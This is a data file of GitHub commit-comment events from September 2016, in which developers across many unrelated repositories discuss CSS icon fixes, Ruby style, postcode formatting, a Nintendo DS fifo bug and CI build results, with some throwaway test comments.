{"id":"4541344963","type":"CommitCommentEvent","actor":{"login":"qubez"},"repo":{"name":"nilsteampassnet/TeamPass"},"payload":{"comment":{"id":18966494,"position":null,"line":null,"path":null,"commit_id":"1926b333a65dedad160e3c31f0e717a78af9822e","created_at":"2016-09-09T17:30:04Z","updated_at":"2016-09-09T17:30:04Z","body":"I saw that you changed some CSS stuff.\r\n\r\nThe menu bar icon size was tweaked to avoid this effect in Firefox:\r\n\r\n![uneven-menu-bars](https://cloud.githubusercontent.com/assets/1425520/18395057/a1d7ee5e-7671-11e6-8535-38ad256e89c5.png)\r\n\r\nThe bars again look uneven, and they will, except when set to exact sizes.\r\n\r\nI've made the bars as a 15x13 png data URI, 3px for each bar and 2px for the spaces. This replaces the font-awesome icon that is not so awesome. About as small as it can go:\r\n```\r\n.fa-bars {\r\n/*\tfont-size: 10px;\r\n\tline-height: .80; \r\n\tvertical-align: -20%;*/\r\n}\r\n.fa-bars:before {\r\n  display:block;\r\n  content:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAANCAMAAABBwMRzAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAAZQTFRFAAAAAAAApWe5zwAAAAJ0Uk5T/wDltzBKAAAAGUlEQVR42mJgZEAGjAwE+agAkz+w5gEEGAAggABP5U/AbAAAAABJRU5ErkJggg==');\r\n  margin: 0px;\r\n  }\r\n```\r\nGives us a better looking menu:\r\n![uneven-menu-bars-fix](https://cloud.githubusercontent.com/assets/1425520/18396295/beecc9be-7677-11e6-9693-cd3e7c32be8e.png)\r\n"}},"created_at":"2016-09-09T17:30:04Z"}
{"id":"4541349358","type":"CommitCommentEvent","actor":{"login":"scutmason"},"repo":{"name":"nekocode/nekoblog"},"payload":{"comment":{"id":18966506,"position":null,"line":null,"path":null,"commit_id":"4da9dc49be2331510dfb8fdf74bee2cc66bf4fdb","created_at":"2016-09-09T17:30:56Z","updated_at":"2016-09-09T17:30:56Z","body":"Orz ,刚毕业就去创业，厉害。"}},"created_at":"2016-09-09T17:30:56Z"}
{"id":"4541349503","type":"CommitCommentEvent","actor":{"login":"eniolopes"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18966507,"position":61,"line":1032,"path":"lib/ecto/schema.ex","commit_id":"1eacc2693a0ec7c79a6813bee70c72155136c278","created_at":"2016-09-09T17:30:58Z","updated_at":"2016-09-09T17:30:58Z","body":"Didn't see any declaration of `on_replace: :update` on https://github.com/elixir-ecto/ecto/blob/1eacc2693a0ec7c79a6813bee70c72155136c278/test/ecto/changeset/embedded_no_pk_test.exs, was that on purpose?"}},"created_at":"2016-09-09T17:30:58Z"}
{"id":"4541349672","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18966508,"position":null,"line":null,"path":null,"commit_id":"8a9b6748ccf0c5aa2f614b582239647b84efc28f","created_at":"2016-09-09T17:31:00Z","updated_at":"2016-09-09T17:31:00Z","body":"Por alguna extraña razón despues de este commit ya no se ven las sessiones que se crean en myCourses :("}},"created_at":"2016-09-09T17:31:00Z"}
{"id":"4541353742","type":"CommitCommentEvent","actor":{"login":"nekocode"},"repo":{"name":"nekocode/nekoblog"},"payload":{"comment":{"id":18966523,"position":null,"line":null,"path":null,"commit_id":"4da9dc49be2331510dfb8fdf74bee2cc66bf4fdb","created_at":"2016-09-09T17:31:52Z","updated_at":"2016-09-09T17:31:52Z","body":"所以还不是失败了"}},"created_at":"2016-09-09T17:31:52Z"}
{"id":"4541354153","type":"CommitCommentEvent","actor":{"login":"rb6502"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18966527,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T17:31:57Z","updated_at":"2016-09-09T17:31:57Z","body":"Haze: we already put down strict rules about this.  Renaming existing sets isn't going to happen, and for future sets using all the letters for the sake of it will not pass either.  This is just about sets where a few more letters would make an unreadable Eastern European-looking mess into something people can remember and type.\r\n\r\n(There's a proposal to rename the Nintendo VS sets to all have a consistent \"nvs_\" prefix, which this would certainly help with, but that's not guaranteed to happen)."}},"created_at":"2016-09-09T17:31:57Z"}
{"id":"4541357879","type":"CommitCommentEvent","actor":{"login":"pacastillo"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18966537,"position":null,"line":null,"path":null,"commit_id":"e0eedb10f4310f26928e12033f7ceeee7233926d","created_at":"2016-09-09T17:32:44Z","updated_at":"2016-09-09T17:32:44Z","body":"Queda mu bonico, así tan gingerizado       ;)"}},"created_at":"2016-09-09T17:32:44Z"}
{"id":"4541357918","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18966538,"position":null,"line":null,"path":null,"commit_id":"150432bddc82dd2a697c4e23e54f1f86c3906408","created_at":"2016-09-09T17:32:45Z","updated_at":"2016-09-09T17:32:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#b09hTI6JSDiTo22WLrzqPA"}},"created_at":"2016-09-09T17:32:45Z"}
{"id":"4541358626","type":"CommitCommentEvent","actor":{"login":"ctro"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18966540,"position":17,"line":16,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-09T17:32:53Z","updated_at":"2016-09-09T17:32:53Z","body":"or\r\n```\r\nreturn if self.checkins....empty?\r\n  true\r\nelse\r\n  false\r\nend"}},"created_at":"2016-09-09T17:32:53Z"}
{"id":"4541360998","type":"CommitCommentEvent","actor":{"login":"ctro"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18966546,"position":17,"line":16,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-09T17:33:25Z","updated_at":"2016-09-09T17:33:25Z","body":"OR \r\n\r\n```\r\nreturn self.checkins....empty? ? false : true\r\n```\r\n```"}},"created_at":"2016-09-09T17:33:25Z"}
{"id":"4541362037","type":"CommitCommentEvent","actor":{"login":"bekarice"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966551,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:33:38Z","updated_at":"2016-09-09T17:33:38Z","body":"@claudiosmweb @tamarazuk fwiw here, if WC is going to save all 9 digits for the US, I'd love to see them formatted correctly like Brazil postcodes, or be cut off at 5 digits (though saving the additional +4 would be preferred). There are definitely a lot of gateways and  integrations that either expect `99999` or `99999-9999`, and they don't always handle `999999999` to re-format it themselves, so WC is essentially breaking that for no reason.\r\n\r\nWhile we could work around it, we're not the only people that have built integrations for payment gateways or other services 😸  If all digits are going to be saved, imo they should be in an expected format."}},"created_at":"2016-09-09T17:33:38Z"}
{"id":"4541363271","type":"CommitCommentEvent","actor":{"login":"ctro"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18966555,"position":15,"line":14,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-09T17:33:54Z","updated_at":"2016-09-09T17:33:54Z","body":"Nice, yeah, this method needed a parameter :)"}},"created_at":"2016-09-09T17:33:54Z"}
{"id":"4541368467","type":"CommitCommentEvent","actor":{"login":"ctro"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18966571,"position":1,"line":1,"path":".byebug_history","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-09T17:34:57Z","updated_at":"2016-09-09T17:34:57Z","body":"Add `.byebug_history` to your `.gitignore` file"}},"created_at":"2016-09-09T17:34:57Z"}
{"id":"4541375423","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"B--B/Alucard-Kernel-jfltexx"},"payload":{"comment":{"id":18966588,"position":null,"line":null,"path":null,"commit_id":"3f6a972d1dca5084855788bcef363b3494fa9c8f","created_at":"2016-09-09T17:36:21Z","updated_at":"2016-09-09T17:36:21Z","body":"@dkati did you take a look at drivers? They are the same, only difference is the adaption, cm has 3.4 kernel, we have fuse from 3.10 and fs partially ported to 3.18.. I' ve disabled sdcardfs drivers on MM and N for the moment, but i did not have a single issues on both MM and N in these days. Some useful infos about the crash (logs, fs, etc)?"}},"created_at":"2016-09-09T17:36:21Z"}
{"id":"4541376085","type":"CommitCommentEvent","actor":{"login":"ramalva92"},"repo":{"name":"ramalva92/inClassDemo2"},"payload":{"comment":{"id":18966590,"position":1,"line":1,"path":"Readme.txt","commit_id":"f210fa5407efe6fae98f889a0176966cd475d089","created_at":"2016-09-09T17:36:29Z","updated_at":"2016-09-09T17:36:29Z","body":"is this a test?"}},"created_at":"2016-09-09T17:36:29Z"}
{"id":"4541381160","type":"CommitCommentEvent","actor":{"login":"jwittner"},"repo":{"name":"Microsoft/HoloToolkit-Unity"},"payload":{"comment":{"id":18966608,"position":null,"line":null,"path":null,"commit_id":"4d8fd9213fee9934e5b439f81c340b418ff0da72","created_at":"2016-09-09T17:37:34Z","updated_at":"2016-09-09T17:37:34Z","body":"#208 for reference, let's move any further conversation there."}},"created_at":"2016-09-09T17:37:34Z"}
{"id":"4541382950","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18966615,"position":null,"line":null,"path":null,"commit_id":"de7f4cd200a6d9c51c935196124d7655575ced9e","created_at":"2016-09-09T17:37:57Z","updated_at":"2016-09-09T17:37:57Z","body":"What do you mean? It already checks if unit/initscript exists."}},"created_at":"2016-09-09T17:37:57Z"}
{"id":"4541384573","type":"CommitCommentEvent","actor":{"login":"MarkHerhold"},"repo":{"name":"Starcounter-Jack/JSON-Patch"},"payload":{"comment":{"id":18966619,"position":null,"line":null,"path":null,"commit_id":"924069918a7033849c1e61e793488b506f1849c1","created_at":"2016-09-09T17:38:17Z","updated_at":"2016-09-09T17:38:17Z","body":"I was a bit disappointed to see web code when I use JSON-Patch server-side and in also in the browser (Aurelia) that handles object changes manually when my models change.\r\n\r\nI always thought that having JSON-Patch handle mouse and keyboard triggers was a total hack and gives me some uncertainty as to how it will behave in my own projects. I'd honestly be happier if there was just a wrapper module that handled the keyboard and mouse triggers or if JSON-Patch had a config that kept this stuff off by default."}},"created_at":"2016-09-09T17:38:17Z"}
{"id":"4541385588","type":"CommitCommentEvent","actor":{"login":"SillyMoo"},"repo":{"name":"concourse/docker-image-resource"},"payload":{"comment":{"id":18966622,"position":29,"line":87,"path":"assets/in","commit_id":"c332dcbf9f99d02660e8880b29376aad9b729014","created_at":"2016-09-09T17:38:29Z","updated_at":"2016-09-09T17:38:29Z","body":"Is it ok that this like will output nothing in the 'skip_download' case?"}},"created_at":"2016-09-09T17:38:29Z"}
{"id":"4541387304","type":"CommitCommentEvent","actor":{"login":"felquis"},"repo":{"name":"abc-dev/2016"},"payload":{"comment":{"id":18966627,"position":49,"line":70,"path":"src/index.html","commit_id":"8e04d819ebe32aa89518ef4685220b6ca4cc661c","created_at":"2016-09-09T17:38:49Z","updated_at":"2016-09-09T17:38:49Z","body":"Missing deploy"}},"created_at":"2016-09-09T17:38:49Z"}
{"id":"4541388841","type":"CommitCommentEvent","actor":{"login":"JoachimBisch"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966633,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:39:11Z","updated_at":"2016-09-09T17:39:11Z","body":"Nice"}},"created_at":"2016-09-09T17:39:11Z"}
{"id":"4541389236","type":"CommitCommentEvent","actor":{"login":"JackAndre"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966634,"position":2,"line":2,"path":"README.md","commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:39:15Z","updated_at":"2016-09-09T17:39:15Z","body":"test\r\n"}},"created_at":"2016-09-09T17:39:15Z"}
{"id":"4541391346","type":"CommitCommentEvent","actor":{"login":"JackAndre"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966639,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:39:42Z","updated_at":"2016-09-09T17:39:42Z","body":"hi"}},"created_at":"2016-09-09T17:39:42Z"}
{"id":"4541391714","type":"CommitCommentEvent","actor":{"login":"felquis"},"repo":{"name":"abc-dev/2016"},"payload":{"comment":{"id":18966640,"position":49,"line":70,"path":"src/index.html","commit_id":"8e04d819ebe32aa89518ef4685220b6ca4cc661c","created_at":"2016-09-09T17:39:48Z","updated_at":"2016-09-09T17:39:48Z","body":"![image](https://cloud.githubusercontent.com/assets/736728/18396645/2d8fb8b8-769b-11e6-89f0-f49611eb3937.png)\r\n\r\n9 de setembro :) "}},"created_at":"2016-09-09T17:39:48Z"}
{"id":"4541392109","type":"CommitCommentEvent","actor":{"login":"JackAndre"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966641,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:39:53Z","updated_at":"2016-09-09T17:39:53Z","body":"slt\r\n"}},"created_at":"2016-09-09T17:39:53Z"}
{"id":"4541393035","type":"CommitCommentEvent","actor":{"login":"JackAndre"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966645,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:40:06Z","updated_at":"2016-09-09T17:40:06Z","body":"lololoolollolo"}},"created_at":"2016-09-09T17:40:06Z"}
{"id":"4541393558","type":"CommitCommentEvent","actor":{"login":"JackAndre"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966647,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:40:13Z","updated_at":"2016-09-09T17:40:13Z","body":"xD"}},"created_at":"2016-09-09T17:40:13Z"}
{"id":"4541394565","type":"CommitCommentEvent","actor":{"login":"JoachimBisch"},"repo":{"name":"JoachimBisch/CoderDojoQuiz-"},"payload":{"comment":{"id":18966651,"position":null,"line":null,"path":null,"commit_id":"eaaa5011ed6f2981ba51ed59d371d25f2484dadf","created_at":"2016-09-09T17:40:24Z","updated_at":"2016-09-09T17:40:24Z","body":"hoho"}},"created_at":"2016-09-09T17:40:24Z"}
{"id":"4541395644","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966653,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:40:38Z","updated_at":"2016-09-09T17:40:38Z","body":"I tested with DS-Xtreme. Because with it's LEDs I can tell if the card reset occurs. My current code has a small delay...But you are still using the card reset code from libnds. I will try it with the version in my 1.7 build of NTR Launcher."}},"created_at":"2016-09-09T17:40:38Z"}
{"id":"4541396310","type":"CommitCommentEvent","actor":{"login":"meritt"},"repo":{"name":"htmlacademy/yomoyo"},"payload":{"comment":{"id":18966657,"position":null,"line":null,"path":null,"commit_id":"a5b68d73bf37576df6dec13fbb7be2df19438746","created_at":"2016-09-09T17:40:46Z","updated_at":"2016-09-09T17:40:46Z","body":"👏"}},"created_at":"2016-09-09T17:40:46Z"}
{"id":"4541396480","type":"CommitCommentEvent","actor":{"login":"KangOl"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18966658,"position":52,"line":260,"path":"openerp/tools/convert.py","commit_id":"42cfb8e66eb06b92ddcb866b6870cc1cde16dc3b","created_at":"2016-09-09T17:40:48Z","updated_at":"2016-09-09T17:40:48Z","body":"missing parentheses around exception types"}},"created_at":"2016-09-09T17:40:48Z"}
{"id":"4541397152","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966660,"position":13,"line":53,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:40:56Z","updated_at":"2016-09-09T17:40:56Z","body":"asdf"}},"created_at":"2016-09-09T17:40:56Z"}
{"id":"4541397353","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966661,"position":14,"line":53,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:40:58Z","updated_at":"2016-09-09T17:40:58Z","body":"asdf"}},"created_at":"2016-09-09T17:40:58Z"}
{"id":"4541397864","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966663,"position":14,"line":53,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:06Z","updated_at":"2016-09-09T17:41:06Z","body":"asdf"}},"created_at":"2016-09-09T17:41:06Z"}
{"id":"4541398579","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966664,"position":23,"line":58,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:14Z","updated_at":"2016-09-09T17:41:14Z","body":"asdf"}},"created_at":"2016-09-09T17:41:14Z"}
{"id":"4541399024","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966667,"position":24,"line":59,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:20Z","updated_at":"2016-09-09T17:41:20Z","body":"asdfasdf"}},"created_at":"2016-09-09T17:41:20Z"}
{"id":"4541399418","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966669,"position":25,"line":60,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:26Z","updated_at":"2016-09-09T17:41:26Z","body":"asdfasdf"}},"created_at":"2016-09-09T17:41:26Z"}
{"id":"4541399993","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966672,"position":26,"line":61,"path":"src/templates/widget/project-list.html","commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:31Z","updated_at":"2016-09-09T17:41:31Z","body":"asdf"}},"created_at":"2016-09-09T17:41:31Z"}
{"id":"4541401743","type":"CommitCommentEvent","actor":{"login":"tbaker0815"},"repo":{"name":"tbaker0815/upwork_project"},"payload":{"comment":{"id":18966679,"position":null,"line":null,"path":null,"commit_id":"e852c00e08616a740b6a217d9c96f2664dff539f","created_at":"2016-09-09T17:41:53Z","updated_at":"2016-09-09T17:41:53Z","body":"asdfasdf"}},"created_at":"2016-09-09T17:41:53Z"}
{"id":"4541403086","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966681,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:42:10Z","updated_at":"2016-09-09T17:42:10Z","body":"> and they don't always handle 999999999 to re-format it themselves, so WC is essentially breaking that for no reason.\r\n\r\nThis is bad, for example in Brazil we handle `99999-999`, `99.999-999` and `99999999`. It's always best check first."}},"created_at":"2016-09-09T17:42:10Z"}
{"id":"4541407935","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"naturalatlas/node-gdal"},"payload":{"comment":{"id":18966693,"position":31,"line":217,"path":"scripts/build-appveyor.bat","commit_id":"c80aa913993fd40e2f4ab4723b1e6d44ae8f8858","created_at":"2016-09-09T17:43:10Z","updated_at":"2016-09-09T17:43:10Z","body":"Thanks @BergWerkGIS - I see that documented https://github.com/mapbox/node-pre-gyp#6-publish-when-you-want so I'll consider using that in the future."}},"created_at":"2016-09-09T17:43:10Z"}
{"id":"4541408757","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18966694,"position":null,"line":null,"path":null,"commit_id":"ed4c923c97f4670357a999dc71ce493b4c8fda65","created_at":"2016-09-09T17:43:19Z","updated_at":"2016-09-09T17:43:19Z","body":"Better add a comment for the limit too 😊"}},"created_at":"2016-09-09T17:43:19Z"}
{"id":"4541410975","type":"CommitCommentEvent","actor":{"login":"sunaku"},"repo":{"name":"unblevable/mix-completion"},"payload":{"comment":{"id":18966705,"position":6,"line":6,"path":".mix-completion-tasks.exs","commit_id":"c99f739aab7a8e55a5c1c823f640a2e321c3fb84","created_at":"2016-09-09T17:43:44Z","updated_at":"2016-09-09T17:43:44Z","body":"Consider lazy evaluation using **Stream** until the last stage in the pipeline where you actually need a list."}},"created_at":"2016-09-09T17:43:44Z"}
{"id":"4541417416","type":"CommitCommentEvent","actor":{"login":"vito"},"repo":{"name":"concourse/docker-image-resource"},"payload":{"comment":{"id":18966721,"position":29,"line":87,"path":"assets/in","commit_id":"c332dcbf9f99d02660e8880b29376aad9b729014","created_at":"2016-09-09T17:45:03Z","updated_at":"2016-09-09T17:45:03Z","body":"It's been like that for a while at least. But it is pretty janky."}},"created_at":"2016-09-09T17:45:03Z"}
{"id":"4541417566","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18966722,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T17:45:05Z","updated_at":"2016-09-09T17:45:05Z","body":"IMO it is better leaving things undone (broken)  as in an undefined state, which it is when only compile tested by jenkins. Then everybody is aware of what still needs to be done. A comment \"// Fixme\" at the end of a line it not very helpful"}},"created_at":"2016-09-09T17:45:05Z"}
{"id":"4541417870","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966724,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:45:10Z","updated_at":"2016-09-09T17:45:10Z","body":"I spooted a misplaced fifo wait command. It's before the fifo init stuff too so that may be why your sound stopped working. "}},"created_at":"2016-09-09T17:45:10Z"}
{"id":"4541420127","type":"CommitCommentEvent","actor":{"login":"mhotar"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18966730,"position":null,"line":null,"path":null,"commit_id":"6769dab1219c21a542637e127f03b4b5cf6d156a","created_at":"2016-09-09T17:45:36Z","updated_at":"2016-09-09T17:45:36Z","body":"Works great, thank you!"}},"created_at":"2016-09-09T17:45:36Z"}
{"id":"4541428203","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966761,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:47:14Z","updated_at":"2016-09-09T17:47:14Z","body":"You had this just after fifoinit();\r\n\r\nfifoWaitValue32(FIFO_USER_03);\r\n\r\nArm9 is does not have a code on it's end to send a vlue for FIFO_USER_03. But arm7 does (that's later down near the card reset call where it should be. So Arm7 is stuck waiting for a command it will never receive. So arm7 is stuck. That broke everything after that fifo command. Thus sound broke and card reset never occurs which also explains the hang after the splash screen."}},"created_at":"2016-09-09T17:47:14Z"}
{"id":"4541428507","type":"CommitCommentEvent","actor":{"login":"bFraley"},"repo":{"name":"Upper-Polo/weather-app"},"payload":{"comment":{"id":18966762,"position":null,"line":null,"path":null,"commit_id":"c09356487360ec373c98ec50800a450a3966a60f","created_at":"2016-09-09T17:47:17Z","updated_at":"2016-09-09T17:47:17Z","body":"closes #1 "}},"created_at":"2016-09-09T17:47:17Z"}
{"id":"4541435451","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":18966783,"position":null,"line":null,"path":null,"commit_id":"38f56bb54fb8601804da11e4410bab23fc93d9a3","created_at":"2016-09-09T17:48:41Z","updated_at":"2016-09-09T17:48:41Z","body":"Closes #1 #4"}},"created_at":"2016-09-09T17:48:41Z"}
{"id":"4541442548","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966808,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:50:07Z","updated_at":"2016-09-09T17:50:07Z","body":"Yep. that fixed it. It was able to boot my R4 (though my R4 hangs on it's load screen like expected since this isn't based on the alt build).\r\n\r\nYou only need to remove that erroneous fifo command and your problems should be fixed."}},"created_at":"2016-09-09T17:50:07Z"}
{"id":"4541444854","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966813,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:50:35Z","updated_at":"2016-09-09T17:50:35Z","body":"oh... huh... I didn't realize that was still there after my merge...\r\n\r\nNormally it would say there was a conflict or something...\r\n\r\nThanks"}},"created_at":"2016-09-09T17:50:35Z"}
{"id":"4541447867","type":"CommitCommentEvent","actor":{"login":"rodrigokono"},"repo":{"name":"rodrigokono/comecandodozero"},"payload":{"comment":{"id":18966821,"position":null,"line":null,"path":null,"commit_id":"2becdc8989fc2ea041913df1fd6c44821ad018a8","created_at":"2016-09-09T17:51:11Z","updated_at":"2016-09-09T17:51:11Z","body":"Ótimo André! Show.. "}},"created_at":"2016-09-09T17:51:11Z"}
{"id":"4541449758","type":"CommitCommentEvent","actor":{"login":"DevShep"},"repo":{"name":"yola/classlist-polyfill"},"payload":{"comment":{"id":18966832,"position":null,"line":null,"path":null,"commit_id":"41a8847fcf084fa1237fe85e87594bd522bee08f","created_at":"2016-09-09T17:51:32Z","updated_at":"2016-09-09T17:51:32Z","body":"I think it was to make this repo a copy of upstream."}},"created_at":"2016-09-09T17:51:32Z"}
{"id":"4541453340","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18966854,"position":null,"line":null,"path":null,"commit_id":"de7f4cd200a6d9c51c935196124d7655575ced9e","created_at":"2016-09-09T17:52:15Z","updated_at":"2016-09-09T17:52:15Z","body":"I had the issue that for **sddm** plymouth after-fex got added. It was always true the or if-rule. It only worked as we checked if the file exists. Since we didn't do that in the latest code anymore, the wrong systemd service was added for **sddm**. Now it works."}},"created_at":"2016-09-09T17:52:15Z"}
{"id":"4541454439","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18966859,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T17:52:27Z","updated_at":"2016-09-09T17:52:27Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (948 of 948 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-26.63%25-green.svg)</a>\n"}},"created_at":"2016-09-09T17:52:27Z"}
{"id":"4541455092","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966860,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:52:35Z","updated_at":"2016-09-09T17:52:35Z","body":"No problem. :D\r\n\r\nI suggest you merge my 1.7 changes. It increases flashcart compatibility drastically. Already got a report from users saying DSTwo boots with it as well as Cyclo DS. Haven not heard yet on RF SDHC clone owners.\r\n\r\n1.7 is a simple change from 1.6. I went back to a custom card reset function with a increased delay between power off and on and disabled logo/secure area error checking in the bootloader. :D"}},"created_at":"2016-09-09T17:52:35Z"}
